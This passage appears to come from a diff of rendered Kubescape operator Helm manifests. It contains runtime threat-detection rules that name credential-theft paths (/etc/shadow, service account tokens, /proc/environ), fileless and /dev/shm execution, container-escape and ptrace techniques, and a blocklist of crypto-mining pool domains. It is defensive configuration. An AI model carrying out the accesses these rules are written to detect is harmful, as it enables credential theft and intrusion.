securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + runAsUser: 100 + args: + - -method=post + - -scheme=http + - -host=operator:4002 + - -path=v1/triggerAction + - -headers=Content-Type:application/json + - -path-body=/home/ks/request-body.json + volumeMounts: + - name: kubevuln-scheduler + mountPath: /home/ks/request-body.json + subPath: request-body.json + readOnly: true + restartPolicy: Never + serviceAccountName: kubevuln + automountServiceAccountToken: false + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null + volumes: + - name: kubevuln-scheduler + configMap: + name: kubevuln-scheduler +--- +apiVersion: apiregistration.k8s.io/v1 +kind: APIService +metadata: + name: v1beta1.spdx.softwarecomposition.kubescape.io + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + group: spdx.softwarecomposition.kubescape.io + groupPriorityMinimum: 1000 + versionPriority: 15 + version: v1beta1 + service: + name: storage + namespace: honey + caBundle: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURMRENDQWhTZ0F3SUJBZ0lSQUpiWTBacHczMnRPYkE3bkJOQVErcVl3RFFZSktvWklodmNOQVFFTEJRQXcKSURFZU1Cd0dBMVVFQXhNVmMzUnZjbUZuWlMwMFV6VkhVM0ZaVG1JNUxXTmhNQjRYRFRJMk1EUXlOVEEyTXpVeApPRm9YRFRJNE1EUXlOREEyTXpVeE9Gb3dJREVlTUJ3R0ExVUVBeE1WYzNSdmNtRm5aUzAwVXpWSFUzRlpUbUk1CkxXTmhNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTMyNnJ0T3ZnaUJqR3ZYZ0wKZWdXdFlTVUZ3M2tNL2tmL3kraWx6TWdwSUIvSnpIZG1jc2M1VVk0RUxYRTdYQllVb1FiL3ZJWmxnNWFNWmt1ZAovT2VncnN1VHVtRWNWRllienpleUtmL0wzSEM5SXZsQzN1d0FzREVyTENHaCs1TmdYc2dkdi9BYjVGNTg0Q21VCnlUUzl2aklFNTYrbmJWQVdnUTVYY3dRQ0xrTGFocitKck1yL0FoYzdRTVNLdXdnK0tOZlBWTWNSWmk3U2pqTXcKNXcvSllxR2k5N0h3a3NzbnZjcWRmb01NKzlCV0pxRndIdlFiaG1Ub2twbm13VVkzNTFEK3ZwZGZOaE5ObG5JeQoyQS9ocWVNOHg2WmYraW1mb2NnWTVtUWcwQkowQzVCTDgrN3BMN29kR2FxWmdkNXpKeTBLVFJPbktmdS96clJQClo4WjJZUUlEQVFBQm8yRXdYekFPQmdOVkhROEJBZjhFQkFNQ0FxUXdIUVlEVlIwbEJCWXdGQVlJS3dZQkJRVUgKQXdFR0NDc0dBUVVGQndNQ01BOEdBMVVkRXdFQi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZFcENZcU9aUXFUbgpOeGFCZDYwOEVTNGRoR3Y3TUEwR0NTcUdTSWIzRFFFQkN3VUFBNElCQVFBd29lRUQxOTZlWFZuay9IK3FDM0Z5CjJXSXJZNzRvVElhU3prYTd1UUd2RzlwOUcxdW5sZHdrUUFlckVjUWpHVDdwcmd1VlkxRlQ0ZUxuQzRSeVF2VG8KY3JGVUFPdTRCVEhsaXFmNGUveXBFWFhVbDltanVJK3hBSDJrUWdXOElpSXFVc1dSYmc2cEtqdCtaL25uVytWbQp5QkNHZzBBSFE3UmJBME5MTVJHOFArYkt4eDRwUlFDQlZHbndnbmk4VnVWVjNkTXYvMHdIbG8rRFRSd3d3eStNCnFOcE1BM0ROeURxQVhYK3Z6RlpKMk1oSlpGcDcvQTVTb3g2cVVKM1V1elpzcjZIeWs0dTA4cHdYMUltK01WbmYKaUd3R1lXT1BEQVl3Zkc3c04rbmZTUklCMUNxbXhHdnNxaktoeWRUbVkwVjFPaGtpbUZybEc4QmErMHQ3SHN3cgotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== +--- +apiVersion: scheduling.k8s.io/v1 +kind: PriorityClass +metadata: + name: kubescape-critical + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape-critical + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape-critical + tier: ks-control-plane + kubescape.io/ignore: 'true' +value: 100000100.0 +globalDefault: false +description: This priority class is for node-agent daemonset pods +--- +apiVersion: kubescape.io/v1 +kind: Rules +metadata: + name: default-rules + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + rules: + - name: Unexpected process launched + enabled: true + id: R0001 + description: Detects unexpected process launches that are not in the baseline + expressions: + message: '''Unexpected process launched: '' + event.comm + '' with PID '' + + string(event.pid)' + uniqueId: event.comm + '_' + event.exepath + ruleExpression: + - eventType: exec + expression: '!ap.was_executed(event.containerId, parse.get_exec_path(event.args, + event.comm))' + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - anomaly + - process + - exec + - applicationprofile + - name: Files Access Anomalies in container + enabled: false + id: R0002 + description: Detects unexpected file access that is not in the baseline + expressions: + message: '''Unexpected file access detected: '' + event.comm + '' with PID '' + + string(event.pid) + '' to '' + event.path' + uniqueId: event.comm + '_' + event.path + ruleExpression: + - eventType: open + expression: "(event.path.startsWith('/etc/') || event.path.startsWith('/var/log/')\ + \ || event.path.startsWith('/var/run/') || event.path.startsWith('/run/')\ + \ || event.path.startsWith('/var/spool/cron/') || event.path.startsWith('/var/www/')\ + \ || event.path.startsWith('/var/lib/') || event.path.startsWith('/opt/')\ + \ || event.path.startsWith('/usr/local/') || event.path.startsWith('/app/')\ + \ || event.path == '/.dockerenv' || event.path == '/proc/self/environ')\ + \ && !(event.path.startsWith('/run/secrets/kubernetes.io/serviceaccount')\ + \ ||\n event.path.startsWith('/var/run/secrets/kubernetes.io/serviceaccount')\ + \ ||\n event.path.startsWith('/tmp'))\n&& !ap.was_path_opened(event.containerId,\ + \ event.path)\n" + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0009 + mitreTechnique: T1005 + tags: + - anomaly + - file + - open + - applicationprofile + - name: Syscalls Anomalies in container + enabled: true + id: R0003 + description: Detects unexpected system calls that are not whitelisted by application + profile + expressions: + message: '''Unexpected system call detected: '' + event.syscallName + '' with + PID '' + string(event.pid)' + uniqueId: event.syscallName + ruleExpression: + - eventType: syscall + expression: '!ap.was_syscall_used(event.containerId, event.syscallName)' + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - anomaly + - syscall + - applicationprofile + - name: Linux Capabilities Anomalies in container + enabled: true + id: R0004 + description: Detects unexpected capabilities that are not whitelisted by application + profile + expressions: + message: '''Unexpected capability used: '' + event.capName + '' in syscall '' + + event.syscallName + '' with PID '' + string(event.pid)' + uniqueId: event.comm + '_' + event.capName + ruleExpression: + - eventType: capabilities + expression: '!ap.was_capability_used(event.containerId, event.capName)' + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - anomaly + - capabilities + - applicationprofile + - name: DNS Anomalies in container + enabled: true + id: R0005 + description: Detecting unexpected domain requests that are not whitelisted by + application profile. + expressions: + message: '''Unexpected domain communication: '' + event.name + '' from: '' + + event.containerName' + uniqueId: event.comm + '_' + event.name + ruleExpression: + - eventType: dns + expression: '!event.name.endsWith(''.svc.cluster.local.'') && !nn.is_domain_in_egress(event.containerId, + event.name)' + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0011 + mitreTechnique: T1071.004 + tags: + - dns + - anomaly + - networkprofile + - name: Unexpected service account token access + enabled: true + id: R0006 + description: Detecting unexpected access to service account token. + expressions: + message: '''Unexpected access to service account token: '' + event.path + '' + with flags: '' + event.flags.join('','')' + uniqueId: event.comm + ruleExpression: + - eventType: open + expression: "((event.path.startsWith('/run/secrets/kubernetes.io/serviceaccount')\ + \ && event.path.endsWith('/token')) || \n (event.path.startsWith('/var/run/secrets/kubernetes.io/serviceaccount')\ + \ && event.path.endsWith('/token')) ||\n (event.path.startsWith('/run/secrets/eks.amazonaws.com/serviceaccount')\ + \ && event.path.endsWith('/token')) ||\n (event.path.startsWith('/var/run/secrets/eks.amazonaws.com/serviceaccount')\ + \ && event.path.endsWith('/token'))) &&\n!ap.was_path_opened_with_suffix(event.containerId,\ + \ '/token')\n" + profileDependency: 0 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1528 + tags: + - anomaly + - serviceaccount + - applicationprofile + - name: Workload uses Kubernetes API unexpectedly + enabled: true + id: R0007 + description: Detecting execution of kubernetes client + expressions: + message: 'eventType == ''exec'' ? ''Kubernetes client ('' + event.comm + '') + was executed with PID '' + string(event.pid) : ''Network connection to Kubernetes + API server from container '' + event.containerName' + uniqueId: 'eventType == ''exec'' ? ''exec_'' + event.comm : ''network_'' + event.dstAddr' + ruleExpression: + - eventType: exec + expression: (event.comm == 'kubectl' || event.exepath.endsWith('/kubectl')) + && !ap.was_executed(event.containerId, parse.get_exec_path(event.args, event.comm)) + - eventType: network + expression: event.pktType == 'OUTGOING' && k8s.is_api_server_address(event.dstAddr) + && !nn.was_address_in_egress(event.containerId, event.dstAddr) + profileDependency: 0 + severity: 5 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0008 + mitreTechnique: T1210 + tags: + - exec + - network + - anomaly + - applicationprofile + - name: Read Environment Variables from procfs + enabled: true + id: R0008 + description: Detecting reading environment variables from procfs. + expressions: + message: '''Reading environment variables from procfs: '' + event.path + '' + by process '' + event.comm' + uniqueId: event.comm + '_' + event.path + ruleExpression: + - eventType: open + expression: 'event.path.startsWith(''/proc/'') && event.path.endsWith(''/environ'') + && !ap.was_path_opened_with_suffix(event.containerId, ''/environ'') + + ' + profileDependency: 0 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1552.001 + tags: + - anomaly + - procfs + - environment + - applicationprofile + - name: eBPF Program Load + enabled: true + id: R0009 + description: Detecting eBPF program load. + expressions: + message: '''bpf program load system call (bpf) was called by process ('' + event.comm + + '') with command (BPF_PROG_LOAD)''' + uniqueId: event.comm + '_' + 'bpf' + '_' + string(event.cmd) + ruleExpression: + - eventType: bpf + expression: event.cmd == uint(5) && !ap.was_syscall_used(event.containerId, + 'bpf') + profileDependency: 1 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1218 + tags: + - bpf + - ebpf + - applicationprofile + - name: Unexpected Sensitive File Access + enabled: true + id: R0010 + description: Detecting access to sensitive files. + expressions: + message: '''Unexpected sensitive file access: '' + event.path + '' by process + '' + event.comm' + uniqueId: event.comm + '_' + event.path + ruleExpression: + - eventType: open + expression: event.path.startsWith('/etc/shadow') && !ap.was_path_opened(event.containerId, + event.path) + profileDependency: 1 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + tags: + - files + - anomaly + - applicationprofile + - name: Unexpected Egress Network Traffic + enabled: false + id: R0011 + description: Detecting unexpected egress network traffic that is not whitelisted + by application profile. + expressions: + message: '''Unexpected egress network communication to: '' + event.dstAddr + + '':'' + string(event.dstPort) + '' using '' + event.proto + '' from: '' + + event.containerName' + uniqueId: event.dstAddr + '_' + string(event.dstPort) + '_' + event.proto + ruleExpression: + - eventType: network + expression: event.pktType == 'OUTGOING' && !net.is_private_ip(event.dstAddr) + && !nn.was_address_in_egress(event.containerId, event.dstAddr) + profileDependency: 0 + severity: 5 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0010 + mitreTechnique: T1041 + tags: + - whitelisted + - network + - anomaly + - networkprofile + - name: Process executed from malicious source + enabled: true + id: R1000 + description: 'Detecting exec calls that are from malicious source like: /dev/shm' + expressions: + message: '''Execution from malicious source: '' + event.exepath + '' in directory + '' + event.cwd' + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + ruleExpression: + - eventType: exec + expression: '(event.exepath == ''/dev/shm'' || event.exepath.startsWith(''/dev/shm/'')) + || (event.cwd == ''/dev/shm'' || event.cwd.startsWith(''/dev/shm/'') || (parse.get_exec_path(event.args, + event.comm).startsWith(''/dev/shm/''))) + + ' + profileDependency: 2 + severity: 8 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - exec + - signature + - malicious + - name: Drifted process executed + enabled: true + id: R1001 + description: Detecting exec calls of binaries that are not included in the base + image + expressions: + message: '''Process ('' + event.comm + '') was executed and is not part of the + image''' + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + ruleExpression: + - eventType: exec + expression: "(event.upperlayer == true ||\n event.pupperlayer == true) &&\n\ + !ap.was_executed(event.containerId, parse.get_exec_path(event.args, event.comm))\n" + profileDependency: 1 + severity: 8 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1036 + tags: + - exec + - malicious + - binary + - base image + - applicationprofile + - name: Process tries to load a kernel module + enabled: true + id: R1002 + description: Detecting Kernel Module Load. + expressions: + message: '''Kernel module ('' + event.module + '') loading attempt with syscall + ('' + event.syscallName + '') was called by process ('' + event.comm + '')''' + uniqueId: event.comm + '_' + event.syscallName + '_' + event.module + ruleExpression: + - eventType: kmod + expression: event.syscallName == 'init_module' || event.syscallName == 'finit_module' + profileDependency: 2 + severity: 10 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1547.006 + tags: + - kmod + - kernel + - module + - load + - name: Disallowed ssh connection + enabled: false + id: R1003 + description: Detecting ssh connection to disallowed port + expressions: + message: '''Malicious SSH connection attempt to '' + event.dstIp + '':'' + string(dyn(event.dstPort))' + uniqueId: event.comm + '_' + event.dstIp + '_' + string(dyn(event.dstPort)) + ruleExpression: + - eventType: ssh + expression: dyn(event.srcPort) >= 32768 && dyn(event.srcPort) <= 60999 && + !(dyn(event.dstPort) in [22, 2022]) && !nn.was_address_in_egress(event.containerId, + event.dstIp) + profileDependency: 1 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0008 + mitreTechnique: T1021.001 + tags: + - ssh + - connection + - port + - malicious + - networkprofile + - name: Process executed from mount + enabled: true + id: R1004 + description: Detecting exec calls from mounted paths. + expressions: + message: '''Process ('' + event.comm + '') was executed from a mounted path''' + uniqueId: event.comm + ruleExpression: + - eventType: exec + expression: '!ap.was_executed(event.containerId, parse.get_exec_path(event.args, + event.comm)) && k8s.get_container_mount_paths(event.namespace, event.podName, + event.containerName).exists(mount, event.exepath.startsWith(mount) || parse.get_exec_path(event.args, + event.comm).startsWith(mount))' + profileDependency: 1 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - exec + - mount + - applicationprofile + - name: Fileless execution detected + enabled: true + id: R1005 + description: Detecting Fileless Execution + expressions: + message: '''Fileless execution detected: exec call "'' + event.comm + ''" is + from a malicious source''' + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + ruleExpression: + - eventType: exec + expression: event.exepath.contains('memfd') || event.exepath.startsWith('/proc/self/fd') + || event.exepath.matches('/proc/[0-9]+/fd/[0-9]+') + profileDependency: 2 + severity: 8 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1055 + tags: + - fileless + - execution + - malicious + - name: Process tries to escape container + enabled: true + id: R1006 + description: Detecting Unshare System Call usage, which can be used to escape + container. + expressions: + message: '''Unshare system call (unshare) was called by process ('' + event.comm + + '')''' + uniqueId: event.comm + '_' + 'unshare' + ruleExpression: + - eventType: unshare + expression: event.pcomm != 'runc' && !ap.was_syscall_used(event.containerId, + 'unshare') + profileDependency: 2 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0004 + mitreTechnique: T1611 + tags: + - unshare + - escape + - unshare + - anomaly + - applicationprofile + - name: Crypto miner launched + enabled: true + id: R1007 + description: Detecting XMR Crypto Miners by randomx algorithm usage. + expressions: + message: '''XMR Crypto Miner process: ('' + event.exepath + '') executed''' + uniqueId: event.exepath + '_' + event.comm + ruleExpression: + - eventType: randomx + expression: 'true' + profileDependency: 2 + severity: 10 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0040 + mitreTechnique: T1496 + tags: + - crypto + - miners + - malicious + - name: Crypto Mining Domain Communication + enabled: true + id: R1008 + description: Detecting Crypto miners communication by domain + expressions: + message: '''Communication with a known crypto mining domain: '' + event.name' + uniqueId: event.name + '_' + event.comm + ruleExpression: + - eventType: dns + expression: event.name in ['2cryptocalc.com.', '2miners.com.', 'antpool.com.', + 'asia1.ethpool.org.', 'bohemianpool.com.', 'botbox.dev.', 'btm.antpool.com.', + 'c3pool.com.', 'c4pool.org.', 'ca.minexmr.com.', 'cn.stratum.slushpool.com.', + 'dash.antpool.com.', 'data.miningpoolstats.stream.', 'de.minexmr.com.', + 'eth-ar.dwarfpool.com.', 'eth-asia.dwarfpool.com.', 'eth-asia1.nanopool.org.', + 'eth-au.dwarfpool.com.', 'eth-au1.nanopool.org.', 'eth-br.dwarfpool.com.', + 'eth-cn.dwarfpool.com.', 'eth-cn2.dwarfpool.com.', 'eth-eu.dwarfpool.com.', + 'eth-eu1.nanopool.org.', 'eth-eu2.nanopool.org.', 'eth-hk.dwarfpool.com.', + 'eth-jp1.nanopool.org.', 'eth-ru.dwarfpool.com.', 'eth-ru2.dwarfpool.com.', + 'eth-sg.dwarfpool.com.', 'eth-us-east1.nanopool.org.', 'eth-us-west1.nanopool.org.', + 'eth-us.dwarfpool.com.', 'eth-us2.dwarfpool.com.', 'eth.antpool.com.', 'eu.stratum.slushpool.com.', + 'eu1.ethermine.org.', 'eu1.ethpool.org.', 'fastpool.xyz.', 'fr.minexmr.com.', + 'kriptokyng.com.', 'mine.moneropool.com.', 'mine.xmrpool.net.', 'miningmadness.com.', + 'monero.cedric-crispin.com.', 'monero.crypto-pool.fr.', 'monero.fairhash.org.', + 'monero.hashvault.pro.', 'monero.herominers.com.', 'monerod.org.', 'monerohash.com.', + 'moneroocean.stream.', 'monerop.com.', 'multi-pools.com.', 'p2pool.io.', + 'pool.kryptex.com.', 'pool.minexmr.com.', 'pool.monero.hashvault.pro.', + 'pool.rplant.xyz.', 'pool.supportxmr.com.', 'pool.xmr.pt.', 'prohashing.com.', + 'rx.unmineable.com.', 'sg.minexmr.com.', 'sg.stratum.slushpool.com.', 'skypool.org.', + 'solo-xmr.2miners.com.', 'ss.antpool.com.', 'stratum-btm.antpool.com.', + 'stratum-dash.antpool.com.', 'stratum-eth.antpool.com.', 'stratum-ltc.antpool.com.', + 'stratum-xmc.antpool.com.', 'stratum-zec.antpool.com.', 'stratum.antpool.com.', + 'supportxmr.com.', 'trustpool.cc.', 'us-east.stratum.slushpool.com.', 'us1.ethermine.org.', + 'us1.ethpool.org.', 'us2.ethermine.org.', 'us2.ethpool.org.', 'web.xmrpool.eu.', + 'www.domajorpool.com.', 'www.dxpool.com.', 'www.mining-dutch.nl.', 'xmc.antpool.com.', + 'xmr-asia1.nanopool.org.', 'xmr-au1.nanopool.org.', 'xmr-eu1.nanopool.org.', + 'xmr-eu2.nanopool.org.', 'xmr-jp1.nanopool.org.', 'xmr-us-east1.nanopool.org.', + 'xmr-us-west1.nanopool.org.', 'xmr.2miners.com.', 'xmr.crypto-pool.fr.', + 'xmr.gntl.uk.', 'xmr.nanopool.org.', 'xmr.pool-pay.com.', 'xmr.pool.minergate.com.', + 'xmr.solopool.org.', 'xmr.volt-mine.com.', 'xmr.zeropool.io.', 'zec.antpool.com.', + 'zergpool.com.', 'auto.c3pool.org.', 'us.monero.herominers.com.', 'xmr.kryptex.network.'] + profileDependency: 2 + severity: 10 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0011 + mitreTechnique: T1071.004 + tags: + - network + - crypto + - miners + - malicious + - dns + - name: Crypto Mining Related Port Communication + enabled: true + id: R1009 + description: Detecting Crypto Miners by suspicious port usage. + expressions: + message: '''Detected crypto mining related port communication on port '' + string(event.dstPort) + + '' to '' + event.dstAddr + '' with protocol '' + event.proto' + uniqueId: event.comm + '_' + string(event.dstPort) + ruleExpression: + - eventType: network + expression: event.proto == 'TCP' && event.pktType == 'OUTGOING' && event.dstPort + in [3333, 45700] && !nn.was_address_in_egress(event.containerId, event.dstAddr) + profileDependency: 1 + severity: 3 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0011 + mitreTechnique: T1071 + tags: + - network + - crypto + - miners + - malicious + - networkprofile + - name: Soft link created over sensitive file + enabled: true + id: R1010 + description: Detects symlink creation over sensitive files + expressions: + message: '''Symlink created over sensitive file: '' + event.oldPath + '' -> + '' + event.newPath' + uniqueId: event.comm + '_' + event.oldPath + ruleExpression: + - eventType: symlink + expression: (event.oldPath.startsWith('/etc/shadow') || event.oldPath.startsWith('/etc/sudoers')) + && !ap.was_path_opened(event.containerId, event.oldPath) + profileDependency: 1 + severity: 5 + supportPolicy: true + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + tags: + - anomaly + - symlink + - applicationprofile + - name: ld_preload hooks technique detected + enabled: false + id: R1011 + description: Detecting ld_preload hook techniques. + expressions: + message: 'eventType == ''exec'' ? ''Process ('' + event.comm + '') is using + a dynamic linker hook: '' + process.get_ld_hook_var(event.pid) : ''The dynamic + linker configuration file ('' + event.path + '') was modified by process ('' + + event.comm + '')''' + uniqueId: 'eventType == ''exec'' ? ''exec_'' + event.comm : ''open_'' + event.path' + ruleExpression: + - eventType: exec + expression: event.comm != 'java' && event.containerName != 'matlab' && process.get_ld_hook_var(event.pid) + != '' + - eventType: open + expression: event.path == '/etc/ld.so.preload' && has(event.flagsRaw) && event.flagsRaw + != 0 + profileDependency: 1 + severity: 5 + supportPolicy: true + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1574.006 + tags: + - exec + - malicious + - applicationprofile + - name: Hard link created over sensitive file + enabled: true + id: R1012 + description: Detecting hardlink creation over sensitive files. + expressions: + message: '''Hardlink created over sensitive file: '' + event.oldPath + '' - + '' + event.newPath' + uniqueId: event.comm + '_' + event.oldPath + ruleExpression: + - eventType: hardlink + expression: (event.oldPath.startsWith('/etc/shadow') || event.oldPath.startsWith('/etc/sudoers')) + && !ap.was_path_opened(event.containerId, event.oldPath) + profileDependency: 1 + severity: 5 + supportPolicy: true + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + tags: + - files + - malicious + - applicationprofile + - name: Malicious Ptrace Usage + enabled: true + id: R1015 + description: Detecting potentially malicious ptrace usage. + expressions: + message: '''Malicious ptrace usage detected from: '' + event.comm' + uniqueId: event.exepath + '_' + event.comm + ruleExpression: + - eventType: ptrace + expression: 'true' + profileDependency: 2 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1622 + tags: + - process + - malicious + - name: Unexpected io_uring Operation Detected + enabled: true + id: R1030 + description: Detects io_uring operations that were not recorded during the initial + observation period, indicating potential unauthorized activity. + expressions: + message: '''Unexpected io_uring operation detected: (opcode='' + string(event.opcode) + + '') flags=0x'' + (has(event.flagsRaw) ? string(event.flagsRaw) : ''0'') + + '' in '' + event.comm + ''.''' + uniqueId: string(event.opcode) + '_' + event.comm + ruleExpression: + - eventType: iouring + expression: 'true' + profileDependency: 0 + severity: 5 + supportPolicy: true + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1218 + tags: + - syscalls + - io_uring + - applicationprofile +--- +apiVersion: kubescape.io/v1 +kind: RuntimeRuleAlertBinding +metadata: + name: all-rules-all-pods + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + namespaceSelector: + matchExpressions: + - key: kubernetes.io/metadata.name + operator: NotIn + values: + - kubescape + - kube-system + - kube-flannel + - ingress-nginx + - olm + - px-operator + - honey + - pl + - clickhouse + - kube-public + - kube-node-lease + - local-path-storage + - gmp-system + - gmp-public + - storm + - lightening + - cert-manager + rules: + - ruleName: Unexpected process launched + - ruleName: Files Access Anomalies in container + - ruleName: Syscalls Anomalies in container + - ruleName: Linux Capabilities Anomalies in container + - ruleName: DNS Anomalies in container + - ruleName: Unexpected service account token access + - ruleName: Workload uses Kubernetes API unexpectedly + - ruleName: Process executed from malicious source + - ruleName: Process tries to load a kernel module + - ruleName: Drifted process executed + - ruleName: Disallowed ssh connection + - ruleName: Fileless execution detected + - ruleName: Crypto miner launched + - ruleName: Process executed from mount + - ruleName: Crypto Mining Related Port Communication + - ruleName: Crypto Mining Domain Communication + - ruleName: Read Environment Variables from procfs + - ruleName: eBPF Program Load + - ruleName: Soft link created over sensitive file + - ruleName: Unexpected Sensitive File Access + - ruleName: Hard link created over sensitive file + - ruleName: Exec to pod + - ruleName: Port forward + - ruleName: Unexpected Egress Network Traffic + - ruleName: Malicious Ptrace Usage + - ruleName: Unexpected io_uring Operation Detected +--- +apiVersion: admissionregistration.k8s.io/v1 +kind: ValidatingWebhookConfiguration +metadata: + name: validation + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +webhooks: +- name: validation.kubescape.admission + clientConfig: + service: + name: kubescape-admission-webhook + namespace: honey + path: /validate + port: 443 + caBundle: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURGekNDQWYrZ0F3SUJBZ0lRSWZrRGU0S0h2aFE1TlNGUWovWFk0ekFOQmdrcWhraUc5dzBCQVFzRkFEQVcKTVJRd0VnWURWUVFEREFzcUxtaHZibVY1TG5OMll6QWVGdzB5TmpBME1qVXdOak0xTVRoYUZ3MHlPVEF5TVRJdwpOak0xTVRoYU1CWXhGREFTQmdOVkJBTU1DeW91YUc5dVpYa3VjM1pqTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGCkFBT0NBUThBTUlJQkNnS0NBUUVBdzNWR1Nqc203dFNOeWwzdSsrY3FmdkplSmdRTDhwZG1qK0RBZWQya25oRE0KbVJWOHZtdXR1Unc2SE9rdlR4UmsyZnZUMWptRndHYWxMMVhqQ3M0SzZNQUJHS2VNTitpZUFIb0VXSXUzUENYYgpVdHc4SmVCNEZQWkpadEs5U0VLWElzVWVleTRBam5UNzFncmh0TkZkWFNoT2Y1a1AwaFlMR3V6MUFyaEUxR2pNCmlIaEJ4OWc1a1I1ZnpLcUphYVFZUk15ZnVlYmZVVUZjb2FyOG8xL1I2d1k0cE42KzdPYlE3UUhTSGM1bFN0SXoKWE50L0xjUjNIU0xVdVdEWkQ0UmN3dE1HSkEwRGdLcUExT1VrdzVSWW9DM3JVMHVlRG1rK2pzRVUrQUNDTEdqagpoYk9tcHJoSGs4bkkzcXRNYmM2bFVRRmlCdkRkSzFpdVd0Y3ZoOXNmbndJREFRQUJvMkV3WHpBT0JnTlZIUThCCkFmOEVCQU1DQXFRd0hRWURWUjBsQkJZd0ZBWUlLd1lCQlFVSEF3RUdDQ3NHQVFVRkJ3TUNNQThHQTFVZEV3RUIKL3dRRk1BTUJBZjh3SFFZRFZSME9CQllFRk54aGhTcjRmaFJydVJwWlpueVJZSlFqcDVaOE1BMEdDU3FHU0liMwpEUUVCQ3dVQUE0SUJBUUJLT0hDaGNoTHQwcS9DaGhJdUtSZ1Q4VUY4OXpWY2hPZzI2Q0J4cWFOQk1vRnhwZE43CmxzZ1VjSGpXY0FaalFRZlI3UlhORDkxL25pL0l6QjBGb2JqKzZPY2tncXNydlZQZzlJc29kTjhJTi9tZkJ1cG4KdkFpY0JyNFd5RHI0dFA3Yk1Ma1RKU2p6UVpOT2E1NVMvTTNRU0xOOW5IVWM0MW5nVUFyeUtXUDdCancySlRZNQprR1lDNWdXZjJXR0F6aG1tMjJmbmZrMXNPK0N1TnErSlBqWmNrR210ZUhCbkNnYUNsblRaNkFkeFUySWd6UlFZCndNUHpJajJBVUkzMXlNZlZLMkZmOU5NV0M0YVAwUk4va3cwaXNOaVpVR1NaZTAzQk05L3hhSy93VkJ1d3BFdlAKVjhYcGwrREtXWFkwcVZaMWwzTk5SNUJFSG5qZldKYisraUROCi0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K + admissionReviewVersions: + - v1 + sideEffects: None + rules: + - operations: + - CREATE + - UPDATE + - DELETE + - CONNECT + apiGroups: + - '*' + apiVersions: + - v1 + resources: + - pods + - 